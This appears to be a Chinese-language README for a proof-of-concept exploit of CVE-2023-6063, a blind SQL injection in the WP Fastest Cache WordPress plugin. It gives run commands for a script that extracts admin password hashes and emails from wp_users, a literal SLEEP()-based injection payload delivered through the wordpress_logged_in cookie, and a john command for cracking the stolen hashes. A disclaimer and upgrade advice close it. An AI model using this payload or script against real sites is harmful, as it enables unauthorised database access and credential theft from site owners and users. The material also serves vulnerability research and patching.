这是 CVE-2023-6063 的概念验证,这是一个存在于 WP Fastest Cache ≤1.2.2 中的基于时间的盲 SQL 注入漏洞。通过滥用 wordpress_logged_in cookie,从 wp_users 表中提取哈希密码(user_pass)和电子邮件(user_email)。
此脚本提取:
安装依赖(如果尚未安装):
pip install -r requirements.txt
基本用法:
python3 poc.py -u https://vulnerable-website.com --username admin --delay 5
完整选项:
-h, --help 显示此帮助信息并退出
-u URL, --url URL 用于测试 CVE-2023-6063 的 WordPress 完整 URL
--username USERNAME 定义要提取哈希密码的用户
-d DELAY, --delay DELAY
等待 Web 响应的时间,默认 5,最小 2
-H HASH, --hash HASH 用于与 wp_users 表验证的哈希,如果哈希包含特殊字符,请使用单引号 -> '<hash>'
--domain DOMAIN 用于电子邮件验证的域名
-c COOKIE, --cookie COOKIE
如果上下文中 cookie 名称不同,请指定
--status-code STATUS_CODE
使用特定的成功状态码,默认 200
--debug 更详细的输出
--just-hash 仅提取哈希密码
--just-email 仅提取用户的电子邮件值
这是针对 admin 用户的演示
https://github.com/user-attachments/assets/21ea643d-3b11-401f-813f-b85abdb05890
当哈希密码泄露时,如果密码较弱,可使用 john 或 hashcat 配合 PHPass 算法解密。
John 示例:
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt --format=phpass
WordPress 的 WP Fastest Cache 插件(≤1.2.2)存在一个未经身份验证的盲 SQL 注入漏洞,通过 wordpress_logged_in cookie 利用。攻击者可利用此漏洞通过 SQL 查询中的基于时间的延迟(SLEEP())从 wp_users 表中提取敏感数据(例如密码哈希、电子邮件地址)。
" AND (IF((SELECT user_pass FROM wp_users WHERE user_login="admin") LIKE 'a%', SLEEP(5), 0))-- -
🚨 免责声明:仅在获得适当授权的情况下将此信息用于道德安全测试。未经授权的利用是非法的。
将 WP Fastest Cache 升级到版本 >1.2.2。